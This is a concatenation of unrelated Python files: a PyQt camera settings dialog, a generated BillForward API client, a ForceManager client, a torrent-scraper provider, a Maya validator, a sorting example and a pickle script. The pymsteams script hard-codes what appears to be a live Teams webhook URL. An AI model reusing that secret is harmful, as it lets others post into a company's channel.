def __init__(self, camera):
super(SetResolutionDropDown, self).__init__()
# announce camera handle
self.camera = camera
# initialise box items
self.initbox()
def initbox(self):
# available choice of resolutions
self.addItem('3280x2464 (extra GPU ram must be allocated)')
self.addItem('1640x1232')
self.addItem('1640x922')
self.addItem('1280x720')
self.addItem('1920x1080')
self.addItem('640x480')
# set to currently chosen resolution
current_resolution = str(self.camera.resolution)
if (current_resolution[0] == '3'):
self.setCurrentText('3280x2464 (extra GPU ram must be allocated)')
else:
self.setCurrentText(current_resolution)
# connect to resolution changer function
self.currentTextChanged.connect(self.res_changer)
@pyqtSlot(str)
def res_changer(self, res_in):
# in case previewing is on, switch off and wait to give
# thread time to finish
restart = False
if (self.camera.preview_state == True):
self.sig_stop_thread.emit()
sleep(0.5)
restart = True
# change camera resolution, include special case for extra text in '3280...'
if (res_in[0] == '3'):
self.camera.resolution = '3280x2464'
else:
self.camera.resolution = res_in
# restart preview thread if was on before
if restart:
self.sig_start_thread.emit()
print('Succesfully changed resolution to:', self.camera.resolution)
class SetResolution(QWidget):
def __init__(self, parent, camera):
super(SetResolution, self).__init__(parent)
# announce camera handle
self.camera = camera
# initialise user interface
self.initUI()
def initUI(self):
# set layout
setres_layout = QHBoxLayout()
# get widgets
self.text = QLabel('Resolution:')
self.dropdown = SetResolutionDropDown(self.camera)
# add widgets to layout
setres_layout.addWidget(self.text)
setres_layout.addWidget(self.dropdown)
# set setres_layout as widget layout
self.setLayout(setres_layout)
class SettingsWindow(QDialog):
def __init__(self, parent, camera):
super(SettingsWindow, self).__init__(parent)
# announce parent (main window)
self.main_window = parent
# announce camera handle
self.camera = camera
# initialise user interface
self.initUI()
# connect signals and slot
self.sigslot_connector()
def initUI(self):
# set title
self.setWindowTitle('Camera Settings')
# set layout
settings_layout = QVBoxLayout()
# get widgets
self.setting_resolution = SetResolution(self.main_window, self.camera)
# add widgets to layout
settings_layout.addWidget(self.setting_resolution)
# set settings_layout as widget layout
self.setLayout(settings_layout)
# set window geometry
self.setFixedSize(settings_layout.sizeHint())
def sigslot_connector(self):
# connect capture preview buttons, for change in resolution
self.setting_resolution.dropdown.sig_start_thread.connect(self.main_window.camerasection.previewwindow.start_preview_thread)
self.setting_resolution.dropdown.sig_stop_thread.connect(self.main_window.camerasection.previewwindow.stop_preview_thread)
class CameraSettingsButton(QPushButton):
def __init__(self, parent, camera):
super(CameraSettingsButton, self).__init__(QIcon('resources/settings.svg'), ' Camera Settings', parent)
# announce main window parent and camera
self.parent = parent
self.camera = camera
# connect
self.clicked.connect(self.open_settings)
def open_settings(self):
# create and open settings window dialog box,
# with handle on camera object
settings = SettingsWindow(self.parent, self.camera)
settings.show()
|
# coding: utf-8
"""
BillForward REST API
OpenAPI spec version: 1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class OrganizationsApi(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def create_organization(self, organization, **kwargs):
"""
Create an organization.
{\"nickname\":\"Create\",\"request\":\"createOrganizationRequest.html\",\"response\":\"createOrganizationResponse.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_organization(organization, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param Organization organization: The organization object to be updated. (required)
:return: OrganizationPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_organization_with_http_info(organization, **kwargs)
else:
(data) = self.create_organization_with_http_info(organization, **kwargs)
return data
def create_organization_with_http_info(self, organization, **kwargs):
"""
Create an organization.
{\"nickname\":\"Create\",\"request\":\"createOrganizationRequest.html\",\"response\":\"createOrganizationResponse.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_organization_with_http_info(organization, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param Organization organization: The organization object to be updated. (required)
:return: OrganizationPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['organization']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_organization" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'organization' is set
if ('organization' not in params) or (params['organization'] is None):
raise ValueError("Missing the required parameter `organization` when calling `create_organization`")
resource_path = '/organizations'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'organization' in params:
body_params = params['organization']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['text/xml', 'application/xml', 'application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OrganizationPagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def get_all_my_organizations(self, **kwargs):
"""
Returns a collection of all my asociated organizations. By default 10 values are returned. Records are returned in natural order.
{\"nickname\":\"Get Mine\",\"response\":\"getOrganizationAll.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_all_my_organizations(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:param int offset: The offset from the first organization to return.
:param int records: The maximum number of organizations to return.
:param str order_by: Specify a field used to order the result set.
:param str order: Ihe direction of any ordering, either ASC or DESC.
:param bool include_retired: Whether retired products should be returned.
:return: OrganizationPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_all_my_organizations_with_http_info(**kwargs)
else:
(data) = self.get_all_my_organizations_with_http_info(**kwargs)
return data
def get_all_my_organizations_with_http_info(self, **kwargs):
"""
Returns a collection of all my asociated organizations. By default 10 values are returned. Records are returned in natural order.
{\"nickname\":\"Get Mine\",\"response\":\"getOrganizationAll.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_all_my_organizations_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:param int offset: The offset from the first organization to return.
:param int records: The maximum number of organizations to return.
:param str order_by: Specify a field used to order the result set.
:param str order: Ihe direction of any ordering, either ASC or DESC.
:param bool include_retired: Whether retired products should be returned.
:return: OrganizationPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['organizations', 'offset', 'records', 'order_by', 'order', 'include_retired']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_my_organizations" % key
)
params[key] = val
del params['kwargs']
resource_path = '/organizations/mine'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'organizations' in params:
query_params['organizations'] = params['organizations']
if 'offset' in params:
query_params['offset'] = params['offset']
if 'records' in params:
query_params['records'] = params['records']
if 'order_by' in params:
query_params['order_by'] = params['order_by']
if 'order' in params:
query_params['order'] = params['order']
if 'include_retired' in params:
query_params['include_retired'] = params['include_retired']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OrganizationPagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def get_all_organizations(self, **kwargs):
"""
Returns a collection of all organizations. By default 10 values are returned. Records are returned in natural order.
{\"nickname\":\"Get All\",\"response\":\"getOrganizationAll.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_all_organizations(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:param int offset: The offset from the first organization to return.
:param int records: The maximum number of organizations to return.
:param str order_by: Specify a field used to order the result set.
:param str order: Ihe direction of any ordering, either ASC or DESC.
:param bool include_retired: Whether retired products should be returned.
:return: OrganizationPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_all_organizations_with_http_info(**kwargs)
else:
(data) = self.get_all_organizations_with_http_info(**kwargs)
return data
def get_all_organizations_with_http_info(self, **kwargs):
"""
Returns a collection of all organizations. By default 10 values are returned. Records are returned in natural order.
{\"nickname\":\"Get All\",\"response\":\"getOrganizationAll.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_all_organizations_with_http_info(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:param int offset: The offset from the first organization to return.
:param int records: The maximum number of organizations to return.
:param str order_by: Specify a field used to order the result set.
:param str order: Ihe direction of any ordering, either ASC or DESC.
:param bool include_retired: Whether retired products should be returned.
:return: OrganizationPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['organizations', 'offset', 'records', 'order_by', 'order', 'include_retired']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_organizations" % key
)
params[key] = val
del params['kwargs']
resource_path = '/organizations'.replace('{format}', 'json')
path_params = {}
query_params = {}
if 'organizations' in params:
query_params['organizations'] = params['organizations']
if 'offset' in params:
query_params['offset'] = params['offset']
if 'records' in params:
query_params['records'] = params['records']
if 'order_by' in params:
query_params['order_by'] = params['order_by']
if 'order' in params:
query_params['order'] = params['order']
if 'include_retired' in params:
query_params['include_retired'] = params['include_retired']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type([])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OrganizationPagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def get_organization_by_customer_code(self, customer_code, **kwargs):
"""
Returns a single organization, specified by the customer-code parameter.
{\"nickname\":\"Retrieve by Customer-Code\",\"response\":\"getOrganizationByCustomer.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_organization_by_customer_code(customer_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str customer_code: The unique customer code of the organization. (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:return: OrganizationPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_organization_by_customer_code_with_http_info(customer_code, **kwargs)
else:
(data) = self.get_organization_by_customer_code_with_http_info(customer_code, **kwargs)
return data
def get_organization_by_customer_code_with_http_info(self, customer_code, **kwargs):
"""
Returns a single organization, specified by the customer-code parameter.
{\"nickname\":\"Retrieve by Customer-Code\",\"response\":\"getOrganizationByCustomer.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_organization_by_customer_code_with_http_info(customer_code, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str customer_code: The unique customer code of the organization. (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:return: OrganizationPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['customer_code', 'organizations']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_organization_by_customer_code" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'customer_code' is set
if ('customer_code' not in params) or (params['customer_code'] is None):
raise ValueError("Missing the required parameter `customer_code` when calling `get_organization_by_customer_code`")
resource_path = '/organizations/customer-code/{customer-code}'.replace('{format}', 'json')
path_params = {}
if 'customer_code' in params:
path_params['customer-code'] = params['customer_code']
query_params = {}
if 'organizations' in params:
query_params['organizations'] = params['organizations']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['text/plain'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OrganizationPagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def get_organization_by_id(self, organization_id, **kwargs):
"""
Returns a single Organization, specified by the organization-ID parameter.
{\"nickname\":\"Retrieve by id\",\"response\":\"getOrganizationByID.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_organization_by_id(organization_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str organization_id: ID of the organization. (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:return: OrganizationPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_organization_by_id_with_http_info(organization_id, **kwargs)
else:
(data) = self.get_organization_by_id_with_http_info(organization_id, **kwargs)
return data
def get_organization_by_id_with_http_info(self, organization_id, **kwargs):
"""
Returns a single Organization, specified by the organization-ID parameter.
{\"nickname\":\"Retrieve by id\",\"response\":\"getOrganizationByID.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_organization_by_id_with_http_info(organization_id, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str organization_id: ID of the organization. (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:return: OrganizationPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['organization_id', 'organizations']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_organization_by_id" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in params) or (params['organization_id'] is None):
raise ValueError("Missing the required parameter `organization_id` when calling `get_organization_by_id`")
resource_path = '/organizations/{organization-ID}'.replace('{format}', 'json')
path_params = {}
if 'organization_id' in params:
path_params['organization-ID'] = params['organization_id']
query_params = {}
if 'organizations' in params:
query_params['organizations'] = params['organizations']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['text/plain'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OrganizationPagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def get_organization_by_name(self, name, **kwargs):
"""
Returns a single Organization, specified by the name parameter.
{\"nickname\":\"Retrieve by Name\",\"response\":\"getOrganizationByName.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_organization_by_name(name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: The name of the Organization. (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:return: OrganizationPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.get_organization_by_name_with_http_info(name, **kwargs)
else:
(data) = self.get_organization_by_name_with_http_info(name, **kwargs)
return data
def get_organization_by_name_with_http_info(self, name, **kwargs):
"""
Returns a single Organization, specified by the name parameter.
{\"nickname\":\"Retrieve by Name\",\"response\":\"getOrganizationByName.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.get_organization_by_name_with_http_info(name, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: The name of the Organization. (required)
:param list[str] organizations: A list of organization-IDs used to restrict the scope of API calls.
:return: OrganizationPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'organizations']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_organization_by_name" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `get_organization_by_name`")
resource_path = '/organizations/name/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
query_params = {}
if 'organizations' in params:
query_params['organizations'] = params['organizations']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['text/plain'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OrganizationPagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
def update_organization(self, organization, **kwargs):
"""
Update an organization.
{\"nickname\":\"Updated\",\"request\":\"updateOrganizationRequest.html\",\"response\":\"updateOrganizationResponse.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_organization(organization, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param Organization organization: The organization object to be updated. (required)
:return: OrganizationPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.update_organization_with_http_info(organization, **kwargs)
else:
(data) = self.update_organization_with_http_info(organization, **kwargs)
return data
def update_organization_with_http_info(self, organization, **kwargs):
"""
Update an organization.
{\"nickname\":\"Updated\",\"request\":\"updateOrganizationRequest.html\",\"response\":\"updateOrganizationResponse.html\"}
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.update_organization_with_http_info(organization, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param Organization organization: The organization object to be updated. (required)
:return: OrganizationPagedMetadata
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['organization']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method update_organization" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'organization' is set
if ('organization' not in params) or (params['organization'] is None):
raise ValueError("Missing the required parameter `organization` when calling `update_organization`")
resource_path = '/organizations'.replace('{format}', 'json')
path_params = {}
query_params = {}
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'organization' in params:
body_params = params['organization']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['text/xml', 'application/xml', 'application/json'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = []
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='OrganizationPagedMetadata',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
|
import pymsteams
webhook = r"https://syngenta.webhook.office.com/webhookb2/c198a158-9e58-4a3d-b9ed-746cb4fadfbd@06219a4a-a835-44d5-afaf-3926343bfb89/IncomingWebhook/2dc314fc05fc4d34bebc1e229991afbb/894ff72d-5ee9-4a9b-82b8-5996a7f82d79"
section1 = pymsteams.cardsection()
section1.title('Introduction')
section1.text('Introductory text')
section2 = pymsteams.cardsection()
section2.title('Development')
section2.activityTitle('Activity title')
section2.activitySubtitle('Activity subtitle')
section2.activityText('Activity text')
section2.addFact('Name', 'Nessa')
section2.addFact('Username', 'S1024501')
message = pymsteams.connectorcard(webhook)
message.text('Test card with activity and facts')
message.color('f731bc')
message.addSection(section1)
message.addSection(section2)
#message.printme()
message.send()
|
import requests
from exceptions import AuthenticationError
import json
class Client:
def __init__(self):
self.base_url = 'https://api.forcemanager.net/api/v4'
self.api_key = ""
self.private_key = ""
self.headers = {'Accept': '*/*', 'Content-Type': 'application/json'}
self.fm_token = ""
self.logged_in = False
def login(self, username=None, password=None):
_api_key = username or self.api_key
_private_key = password or self.private_key
response = requests.post('%s/login' % self.base_url, json={"username": _api_key, "password": _private_key})
json = response.json()
self.fm_token = json['token']
self.headers["X-Session-Key"] = self.fm_token
self.logged_in = True
return True
def request(self, entity, method, entityId=None, params=None, data=None):
if not self.logged_in:
_loginResponse = self.login()
if not _loginResponse:
raise AuthenticationError(errors=_loginResponse.text)
_method = method.lower()
json_payload = data
if _method == "get":
if entityId:
url = '%s/%s/%s' % (self.base_url, entity, entityId)
else:
url = '%s/%s' % (self.base_url, entity)
response = requests.get(url, headers=self.headers, params=params)
elif _method == "post":
response = requests.post('%s/%s' % (self.base_url, entity), headers=self.headers, data=json.dumps(json_payload))
elif _method == "put":
response = requests.put('%s/%s/%s' % (self.base_url, entity, entityId), headers=self.headers, data=json.dumps(json_payload))
#print response.url
return response.json()
def ListWebHooks(self, page=None):
return self.response('hooks', 'get')
def CreateWebHook(self, action, entity, name, url, **kwargs):
payload = {"action": action, "entity": entity, "name": name, "url": url}
for key, value in kwargs.items():
payload[key] = value
return self.request('hook', 'post', '')
def ListAccounts(self, page=None, where=None, order=None):
return self.request('accounts', 'get', params={"where": where})
def RetrieveAccount(self, account_id):
return self.request('accounts', 'get', entityId=account_id)
def UpdateAccount(self, account_id, data):
return self.request('accounts', 'put', entityId=account_id, data=data)
def CreateAccount(self, data):
return self.request('accounts', 'post', data=data)
def ListSales(self, page=None, where=None, order=None):
return self.request('sales', 'get')
def RetrieveSale(self, sale_id):
return self.request('sales', 'get', entityId=sale_id)
def ListProducts(self, page=None, where=None, order=None):
return self.request('products', 'get')
def RetrieveProduct(self, product_id):
return self.request('products', 'get', entityId=product_id)
def CreateProduct(self, model, **kwargs):
data = {"model": model,}
for key, value in kwargs.items():
data[key] = value
return self.request('products', 'post', data=data) |
## import 'sys' library
import sys
## A is the input Array(Unsorted)
A = [64, 25, 12, 22, 11]
for i in range(len(A)):
min_idx = i
for j in range(i+1, len(A)):
if A[min_idx] > A[j]:
min_idx = j
A[i], A[min_idx] = A[min_idx], A[i]
## A is sorted Array
## This will print array elements line by line
print ("Sorted array")
for i in range(len(A)):
print(A[i])
|
# -*- coding: utf-8 -*-
from providerModules.a4kScrapers import core
class sources(core.DefaultSources):
def __init__(self, *args, **kwargs):
super(sources, self).__init__(__name__, *args, single_query=True, **kwargs)
self._filter = core.Filter(fn=self._filter_fn, type='single')
def _filter_fn(self, title, clean_title):
if self.is_movie_query():
return False
if self.scraper.filter_single_episode.fn(title, clean_title):
self._filter.type = self.scraper.filter_single_episode.type
return True
if self.scraper.filter_single_special_episode.fn(title, clean_title):
self._filter.type = self.scraper.filter_single_special_episode.type
return True
if self.scraper.filter_show_pack.fn(title, clean_title):
self._filter.type = self.scraper.filter_show_pack.type
return True
if self.scraper.filter_season_pack.fn(title, clean_title):
self._filter.type = self.scraper.filter_season_pack.type
return True
return False
def _get_scraper(self, title):
return super(sources, self)._get_scraper(title, custom_filter=self._filter)
def _search_request(self, url, query):
query = core.quote_plus(self._imdb)
response = self._request.get(url.base + (url.search % query))
if response.status_code != 200:
return []
try:
results = core.json.loads(response.text)
except Exception as e:
self._request.exc_msg = 'Failed to parse json: %s' % response.text
return []
if len(results) == 0 or results[0]['id'] == '0':
return []
else:
return results
def _soup_filter(self, response):
return response
def _title_filter(self, el):
return el['name']
def _info(self, el, url, torrent):
torrent['hash'] = el['info_hash']
torrent['size'] = int(el['size']) / 1024 / 1024
torrent['seeds'] = el['seeders']
return torrent
def movie(self, title, year, imdb=None):
self._imdb = imdb
return super(sources, self).movie(title, year, imdb, auto_query=False)
def episode(self, simple_info, all_info):
self._imdb = all_info.get('info', {}).get('tvshow.imdb_id', None)
if self._imdb is None:
self._imdb = all_info.get('showInfo', {}).get('ids', {}).get('imdb', None)
return super(sources, self).episode(simple_info, all_info)
|
import pyblish.api
class ValidateRigModelSubset(pyblish.api.InstancePlugin):
"""Get model subset from Geometry group.
"""
label = "Validate Model Subset Data"
order = pyblish.api.ValidatorOrder + 0.13
hosts = ["maya"]
families = [
# "reveries.rig",
"reveries.rig.skeleton"
]
def process(self, instance):
import maya.cmds as cmds
from reveries.maya.usd import rig_prim_export
if not instance.data.get("publishUSD", True):
return
geometry_path = "|ROOT|Group|Geometry"
if not cmds.objExists(geometry_path):
raise RuntimeError(
"{}: Get geometry group failed. It should be {}".format(
instance, geometry_path))
validator = rig_prim_export.RigPrimValidation()
model_subset_data = validator.get_model_subset_data()
invalid_group = validator.get_invalid_group()
model_data = {
"model_data": model_subset_data,
"invalid_group": invalid_group
}
if not validator.validation_result or not model_subset_data:
for log in validator.validation_log:
self.log.error(log)
raise Exception("Model subset data validation failed.")
if model_subset_data:
instance.data["model_subset_data"] = model_data
# instance.data["model_subset_data"] = model_subset_data
|
from pickle import load
from pickle import dump
from os.path import isdir
from os import makedirs
root = 'C:/Users/Ritik/Desktop/2021 Autumn Semester/Assignments/AI/'
pickledtraindata = open(root+'filtered_data/train.pickle',mode='rb')
data = load(pickledtraindata)
pickledtraindata.close()
def put(val,dic):
if val in dic:
dic[val] += 1
else:
dic[val] = 1
droot = root+'classifiers/v2/'
if not isdir(droot): makedirs(droot)
wtwtd = dict()
for x1 in data:
for x2 in x1:
for x3 in x2:
for x4 in x3:
for x5 in x4:
prv = None,None
for x6 in x5:
if x6[0] != 'mw':
put((x6[2],x6[1],prv[0],prv[1]),wtwtd)
prv = x6[2],x6[1]
else:
w = ''
for j in range(len(x6[2])):
x7 = x6[2][j]
if j != 0:
w += x7[2]+' '
put((x7[2],x7[1],prv[1],prv[0]),wtwtd)
wt = (w[:-1],x6[1])
put((wt[1],wt[0],prv[0],prv[1]),wtwtd)
prv = wt
pickledtraindict = open(droot+'train.pickle',mode='wb')
dump(wtwtd,pickledtraindict)
pickledtraindict.close() |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
from base import BaseObject
class ConfidenceLevelPostProcessor(BaseObject):
def __init__(self,
some_analyses: list,
is_debug: bool = False):
"""
Create:
7-Apr-2017
craig.trim@ibm.com
* refactored out of svc:ComputeConfidenceLevels
Updated:
17-Jul-2019
craig.trim@ibm.com
